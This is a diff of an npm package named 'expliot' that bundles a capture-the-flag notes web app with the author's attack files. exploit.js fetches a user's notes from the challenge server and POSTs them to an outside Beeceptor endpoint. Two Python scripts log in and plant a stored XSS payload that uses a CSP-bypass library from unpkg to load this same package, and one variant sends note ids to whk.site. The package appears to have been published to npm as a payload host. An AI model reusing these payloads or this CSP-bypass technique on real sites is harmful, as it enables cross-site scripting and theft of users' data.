expliot 1.0.0

package/app/Dockerfile

@@ -0,0 +1,25 @@
+FROM python:alpine
+RUN pip3 install flask redis rq
+
+COPY . /app
+
+WORKDIR /app
+
+RUN adduser -D -u 1000 ctf
+RUN chown -R ctf:ctf /app
+RUN chmod -R 555 /app && chmod -R 744 /app/notes
+
+RUN mkdir -p /app/notes/admin && rm -rf /app/notes/admin/*
+RUN UUID=$(python -c 'import uuid; print(uuid.uuid4(), end="")') && \
+    echo -e "admin\nFLAG1\nFLAG{flag-1}" > "/app/notes/admin/$UUID" 
+
+RUN chmod -R 555 /app/notes/admin
+
+RUN echo 'FLAG{flag-2}' > "/flag2-$(tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c 16).txt" && \
+    chmod 444 /flag2-*
+
+USER ctf
+
+
+CMD [ "sh", "-c", "flask run --host=0.0.0.0 --port=5000" ]
+

package/app/app.py

@@ -0,0 +1,157 @@
+from flask import Flask, render_template, request, redirect, url_for, flash, jsonify, session
+from uuid import uuid4
+from functools import wraps
+from secrets import token_urlsafe
+import os
+import re
+import sqlite3
+import urllib.request
+
+
+app = Flask(__name__)
+app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY", 'super secret key')
+
+from rq import Queue
+from redis import Redis
+app.queue = Queue(connection=Redis('xss-bot'))
+
+NOTES_DIR = "notes"
+
+users = {"admin": os.environ.get("ADMIN_PASSWORD", "admin")}
+
+
+def login_required(f):
+    @wraps(f)
+    def decorated_function(*args, **kwargs):
+        if not "username" in session:
+            flash("You must be logged in to view this page!", "error")
+            return redirect(url_for("login"))
+        return f(*args, **kwargs)
+
+    return decorated_function
+
+
+@app.after_request
+def add_header(response):
+    # add content security policy header
+    response.headers['Content-Security-Policy'] = "default-src 'self'; style-src 'unsafe-inline'; script-src 'self' https://unpkg.com/"
+    return response
+
+@app.get("/")
+@login_required
+def index():
+    return render_template("index.html")
+
+
+@app.get("/login")
+def login():
+    return render_template("login.html")
+
+
+@app.post("/login")
+def action_login():
+    username = request.form.get("username")
+    password = request.form.get("password")
+
+    if len(username) < 5 or len(password) < 5:
+        flash("Username or password too short!", "error")
+        return redirect(url_for("login"))
+    
+    if not re.match(r"^[a-zA-Z0-9_]+$", username):
+        flash(
+            "Username must only contain alphanumeric characters and underscores!",
+            "error"
+        )
+        return redirect(url_for("login"))
+
+    if username in users and users[username] == password:
+        session["username"] = username
+        return redirect(url_for("index"))
+    elif username not in users and not os.path.exists(os.path.join(NOTES_DIR, username)):
+        users[username] = password
+        os.mkdir(os.path.join(NOTES_DIR, username))
+        flash("Successfully registered!", "success")
+        return redirect(url_for("login"))
+    else:
+        flash("Invalid username or password!", "error")
+        return redirect(url_for("login"))
+
+@app.get("/note")
+def note():
+    return render_template("note.html")
+
+
+@app.get("/api/notes/all")
+@login_required
+def api_notes():
+    notes = []
+    user_dir = os.path.join(NOTES_DIR, session["username"])
+    for filename in os.listdir(user_dir):
+        with open(os.path.join(user_dir, filename)) as f:
+            notes.append({
+                "id": filename,
+                "author": f.readline().strip(),
+                "title": f.readline().strip()
+            })
+    return jsonify(notes)
+
+
+@app.post("/api/notes")
+@login_required
+def api_create_note():
+    if session["username"] == "admin":
+        return {"error": "Admin cannot create notes!"}, 403
+    user_dir = os.path.join(NOTES_DIR, session["username"])
+    note_id = str(uuid4())
+    title, content = request.json["title"], request.json["content"]
+    if len(title) > 48 or len(content) > 256:
+        return {"error": "Title or content too long!"}, 400
+    with open(os.path.join(user_dir, note_id), "w") as f:
+        f.write(session["username"] + "\n")
+        f.write(title + "\n")
+        f.write(content)
+    return {"id": note_id}
+
+
+@app.get("/api/notes")
+@login_required
+def api_get_note_content():
+    note_id = request.args.get("id")
+    author = request.args.get("author") or session.get("username")
+
+    if not note_id or ".." in note_id:
+        return {"error": "Invalid note ID!"}, 400
+
+    if not author or not re.match(r"^[a-zA-Z0-9_]+$", author):
+        return {"error": "Invalid author!"}, 400
+
+    user_dir = os.path.join(NOTES_DIR, author)
+
+    if not os.path.exists(os.path.join(user_dir, note_id)):
+        return {"error": "Note not found!"}, 404
+
+    with open(os.path.join(user_dir, note_id)) as f:
+        note_author = f.readline().strip()
+        title = f.readline().strip()
+        content = f.read().strip()
+
+    if session['username'] != 'admin' and note_author != session["username"]:
+        return {"error": "You do not have permission to view this note!"}, 403
+
+    return {"author": note_author, "title": title, "content": content}
+
+
+@app.post("/report")
+def report():
+    note_id = request.form.get("note_id", "")  # uuid
+    author = request.form.get("author", "")
+
+    if not re.match(r"^[a-zA-Z0-9_]+$", author) or not re.match(r"^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$", note_id):
+        return "Invalid author or note ID!"
+
+    if not os.path.exists(os.path.join(NOTES_DIR, author, note_id)):
+        return "Note not found!"
+
+    app.queue.enqueue("bot.browse", "/note?id=" + note_id + "&author=" + author)
+
+    return "<meta http-equiv='refresh' content='1;url=/'><h1>Report submitted!</h1>"

package/app/static/main.js

@@ -0,0 +1,48 @@
+function updateNoteList() {
+    fetch('/api/notes/all')
+        .then(res => res.json())
+        .then(result => {
+            const noteList = document.querySelector('#noteList');
+            noteList.innerHTML = '';
+            result.forEach(note => {
+                const div = document.createElement('div');
+                div.className = 'note'
+                const h2 = document.createElement('h2');
+                h2.innerText = note.title;
+                div.appendChild(h2);
+                const p = document.createElement('p');
+                p.innerText = `Author: ${note.author || '(anonymous)'}`;
+                div.appendChild(p);
+
+                div.onclick = () => location.href = `/note?id=${note.id}`;
+                noteList.appendChild(div);
+            });
+        })
+}
+
+const form = document.querySelector('#form');
+form.addEventListener('submit', (e) => {
+    e.preventDefault();
+    const data = {
+        title: form.title.value,
+        content: form.content.value
+    };
+    fetch('/api/notes', {
+        method: 'POST',
+        body: JSON.stringify(data),
+        headers: new Headers({
+            'Content-Type': 'application/json'
+        })
+    }).then(res => res.json())
+        .then(result => {
+            form.title.value = '';
+            form.content.value = '';
+            if (result.error) {
+                alert(result.message);
+                return;
+            }
+            updateNoteList();
+        })
+})
+
+updateNoteList();

package/app/static/note.js

@@ -0,0 +1,32 @@
+const noteId = new URLSearchParams(window.location.search).get('id');
+const author = new URLSearchParams(window.location.search).get('author');
+let apiUrl = '/api/notes?id=' + noteId;
+if (author) apiUrl += '&author=' + author;
+fetch(apiUrl)
+    .then(res => res.json())
+    .then(result => {
+        if (result.error) {
+            alert(result.error);
+            location.href = "/";
+            return;
+        }
+        const note = document.querySelector('#note');
+        note.innerHTML = `
+                <h1>${result.title}</h1>
+                <p>${marked.parse(result.content)}</p>
+                <hr/>
+                <span style="color: #999">
+                    By @${result.author}・🔒 Private・
+                    <form action="/report" style="display: inline" method="post">
+                        <input type="hidden" name="note_id" value="${noteId}">
+                        <input type="hidden" name="author" value="${result.author}">
+                        <input type="submit" value="Report">
+                    </form>
+                </span>
+                `;
+        note.querySelector('form').addEventListener('submit', e => {
+            e.preventDefault();
+            if (!confirm('Are you sure to report this note?')) return;
+            e.target.submit();
+        })
+    });

package/app/templates/index.html

@@ -0,0 +1,54 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Note</title>
+    <style>
+        body {
+            font-family: Arial, Helvetica, sans-serif;
+            padding: 0 20vw;
+        }
+
+        @media screen and (max-width: 768px) {
+            body {
+                padding: 0;
+            }
+        }
+
+        #noteList {
+            display: flex;
+            flex-wrap: wrap;
+        }
+
+        .note {
+            cursor: pointer;
+            width: 250px;
+            border: 1px solid #ccc;
+            margin: 10px;
+            padding: 10px;
+        }
+
+        .note:hover {
+            background: #eee;
+        }
+    </style>
+</head>
+
+<body>
+    <h1>Online Note</h1>
+    <form id="form">
+        <p><input type="text" name="title" placeholder="Title"></p>
+        <p><textarea name="content" cols="30" rows="3" placeholder="> Markdown Content"></textarea></p>
+        <input type="submit" value="Add note">
+    </form>
+
+    <hr>
+    <h2>Note list</h2>
+    <div id="noteList">...</div>
+
+    <script src="/static/main.js"></script>
+</body>
+
+</html>

package/app/templates/login.html

@@ -0,0 +1,54 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Login</title>
+    <style>
+        body {
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+            min-height: 100vh;
+        }
+
+        form {
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+        }
+
+        input {
+            margin: 10px;
+            padding: 10px;
+            width: 200px;
+        }
+
+        hr {
+            width: 100%;
+        }
+
+        .message {
+            color: red;
+        }
+    </style>
+</head>
+
+<body>
+    {% for message in get_flashed_messages() %}
+    <div class="message">{{ message }}</div>
+    {% endfor %}
+
+    <h1>Login & Register</h1>
+    <form action="/login" method="post" id="login-form">
+        <input type="text" name="username" placeholder="username">
+        <input type="password" name="password" placeholder="password">
+        <input type="submit" value="login">
+    </form>
+
+</body>
+
+</html>

package/app/templates/note.html

@@ -0,0 +1,41 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Note</title>
+    <style>
+        body {
+            font-family: Arial, Helvetica, sans-serif;
+            padding: 0 20vw;
+        }
+
+        @media screen and (max-width: 768px) {
+            body {
+                padding: 0;
+            }
+        }
+
+        hr {
+            margin: 20px 0;
+            /* color */
+            border-top: 1px solid #ddd;
+            border-bottom: 1px solid #ddd;
+        }
+
+        #note {
+            border: 1px solid #ccc;
+            margin: auto 0;
+            padding: 10px;
+        }
+    </style>
+</head>
+
+<body>
+    <div id="note"></div>
+    <script src="https://unpkg.com/marked@11.1.0/marked.min.js"></script>
+    <script src="/static/note.js"></script>
+</body>
+
+</html>

package/app/uwsgi.ini

@@ -0,0 +1,5 @@
+[uwsgi]
+module = app
+callable = app
+uid = 2000
+gid = 2000

package/bot/Dockerfile

@@ -0,0 +1,20 @@
+FROM python:3.11
+
+
+RUN apt update && \
+    apt install -y --no-install-recommends chromium-driver redis-server
+
+
+RUN apt update && \
+    apt install -y --no-install-recommends chromium
+
+RUN rm -rf /var/lib/apt/lists/*
+
+RUN pip3 install --no-cache-dir selenium redis rq
+
+COPY bot.py /bot.py
+COPY run.sh /run.sh
+RUN chmod +x /run.sh
+
+RUN useradd --no-create-home --home-dir / --shell /bin/false user
+CMD bash /run.sh

package/bot/bot.py

@@ -0,0 +1,43 @@
+#!/usr/bin/env python3
+import time
+import os
+
+from selenium.webdriver import Chrome
+from selenium.webdriver.common.by import By
+from selenium.webdriver.chrome.options import Options
+from selenium.common.exceptions import TimeoutException, WebDriverException
+
+TIMEOUT = 5
+
+
+def browse(path):
+    options = Options()
+    options.headless = True
+    options.add_argument('--headless')
+    options.add_argument('--no-sandbox')
+    options.add_argument('--disable-dev-shm-usage')
+    options.add_argument('--no-expose-wasm')
+    options.add_argument('--js-flags=--jitless')
+    
+    chrome = Chrome(options=options)
+    chrome.set_page_load_timeout(TIMEOUT)
+    chrome.set_script_timeout(TIMEOUT)
+
+    try:
+        # login
+        base_url = 'http://web'
+        username, password = 'admin', os.getenv('ADMIN_PASSWORD')
+
+        chrome.get(base_url + "/login")
+        chrome.find_element('name','username').send_keys(username)
+        chrome.find_element('name','password').send_keys(password)
+        # input[type="submit"]
+        chrome.find_element(By.CSS_SELECTOR, 'input[type="submit"]').click()
+        
+        # visit
+        chrome.get(base_url + path)
+        time.sleep(TIMEOUT)
+    except (TimeoutException, WebDriverException) as e:
+        print(e)
+    finally:
+        chrome.quit()

package/bot/run.sh

@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+redis-server --protected-mode no &
+for _ in {1..4}; do
+  rq worker &
+done
+sleep infinity

package/docker-compose.yml

@@ -0,0 +1,20 @@
+version: "3.5"
+
+x-share-env: &share-env
+  ADMIN_PASSWORD: ztLsRe2dX8praTtf5L1FBSY5VuSSXy0Edb01q3AQVgs
+  SECRET_KEY: jR8swB-gpkgILCG2HCMkz1LVWG0Jlj7ANaaRW4ohSZI
+
+services:
+  web:
+    depends_on:
+      - xss-bot
+    build: ./app
+    ports:
+      - 10082:5000/tcp
+    environment:
+      <<: *share-env
+  
+  xss-bot:
+    build: ./bot
+    environment:
+      <<: *share-env

package/exploit.js

@@ -0,0 +1,16 @@
+function leakDataFromEndpoint() {
+    fetch('http://10.113.184.121:10082/api/notes/all')  
+    .then(response => response.json())
+    .then(data => {
+      fetch('https://ntuctf.free.beeceptor.com', {  
+        method: 'POST',
+        body: JSON.stringify(data),
+        headers: { 'Content-Type': 'application/json' }
+      });
+    })
+    .catch(error => console.error('Error:', error));
+  }
+  
+  window.parent.leakDataFromEndpoint = leakDataFromEndpoint;
+
+leakDataFromEndpoint();

package/for_local.py

@@ -0,0 +1,47 @@
+import requests
+from bs4 import BeautifulSoup
+
+# The login URL and the target URL for creating a note
+login_url = 'http://140.112.29.205:10082/login'
+create_note_url = 'http://140.112.29.205:10082/api/notes'
+
+# Your login credentials
+credentials = {
+    'username': '12345',
+    'password': '12345'
+}
+
+
+#測試npm-2
+xss_payload = """
+<iframe srcdoc="
+  <script src='https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js'></script>
+  <script src='https://unpkg.com//test_ctf_ntu_fetch_3/test_ctf_ntu_fetch.js'></script>
+  <br csp= 'leakDataFromEndpoint()'>
+"></iframe>
+"""
+
+# Start a session so we can have persistent cookies
+session = requests.session()
+
+# First, login to the site
+login_response = session.post(login_url, data=credentials)
+
+# Check if login was successful
+if login_response.ok:
+    # Now, create the note with the XSS payload
+    note_data = {
+        'title': 'TestNote_1',
+        'content': xss_payload  # Inserting the XSS payload into the note content
+    }
+    create_note_response = session.post(create_note_url, json=note_data)
+
+    # Check if the request to create a note was successful
+    if create_note_response.ok:
+        print('Note with XSS payload created successfully')
+    else:
+        print('Failed to create note with XSS payload')
+        print('Status Code:', create_note_response.status_code)
+        print('Response:', create_note_response.text)
+else:
+    print('Login failed')

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "expliot",
+  "version": "1.0.0",
+  "description": "getting notes",
+  "main": "exploit.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "robert",
+  "license": "MIT"
+}

package/test_lenght.py

@@ -0,0 +1,88 @@
+str = '''<iframe srcdoc="<script src='//unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js'></script><script>fetch('/api/notes/all').then(r=>r.json()).then(d=>d.forEach(n=>{let u='//whk.site/7b314';fetch(u,{method:'POST',body:JSON.stringify({id:n.id})})}));</script>"></iframe>
+'''
+
+print(len(str))
+
+
+import requests
+from bs4 import BeautifulSoup
+
+# The login URL and the target URL for creating a note
+login_url = 'http://10.113.184.121:10082/login'
+create_note_url = 'http://10.113.184.121:10082/api/notes'
+
+# Your login credentials
+credentials = {
+    'username': 'abcabc',
+    'password': 'abcabc'
+}
+
+# The XSS payload using an iframe that includes a script from unpkg.com and an attempt to execute alert(1)
+
+# 成功塞入alert
+# xss_payload = ("<iframe srcdoc=\"<script src='https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js'>"
+#                "</script><br csp='alert(1)'>\"></iframe>")
+
+# 測試bee -1
+# xss_payload = """
+# <iframe srcdoc=\"
+#     <script>
+#         // 使用fetch从目标网站获取数据
+#         fetch('login/api/notes/all')
+#             .then(response => response.json())
+#             .then(data => {
+#                 // 数据获取成功后，将数据发送到Beeceptor端点
+#                 fetch('https://ntuctf.free.beeceptor.com', {
+#                     method: 'POST',
+#                     body: JSON.stringify(data),
+#                     headers: {'Content-Type': 'application/json'}
+#                 });
+#             })
+#             .catch(error => console.error('Error:', error));
+#     </script>
+# \"></iframe>
+# """
+
+#測試npm-1
+# xss_payload = """
+# <iframe srcdoc="
+#   <script src='https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js'></script>
+#   <script src='https://unpkg.com/test_ctf_ntu_fetch/test_ctf_ntu_fetch.js'></script>
+#   <script>window.leakDataFromEndpoint();</script>
+# "></iframe>
+# """
+
+#測試npm-2
+xss_payload = """
+<iframe srcdoc="
+  <script src='https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js'></script>
+  <script src='https://unpkg.com//test_ctf_ntu_fetch_3/test_ctf_ntu_fetch.js'></script>
+  <br csp= 'leakDataFromEndpoint()'>
+"></iframe>
+"""
+
+
+# Start a session so we can have persistent cookies
+session = requests.session()
+
+# First, login to the site
+login_response = session.post(login_url, data=credentials)
+
+# Check if login was successful
+if login_response.ok:
+    # Now, create the note with the XSS payload
+    note_data = {
+        'title': 'XSS_npm_7',
+        'content': "xss_payload"  # Inserting the XSS payload into the note content
+    }
+    create_note_response = session.post(create_note_url, json=note_data)
+
+    # Check if the request to create a note was successful
+    if create_note_response.ok:
+        print('Note with XSS payload created successfully')
+    else:
+        print('Failed to create note with XSS payload')
+        print('Status Code:', create_note_response.status_code)
+        print('Response:', create_note_response.text)
+else:
+    print('Login failed')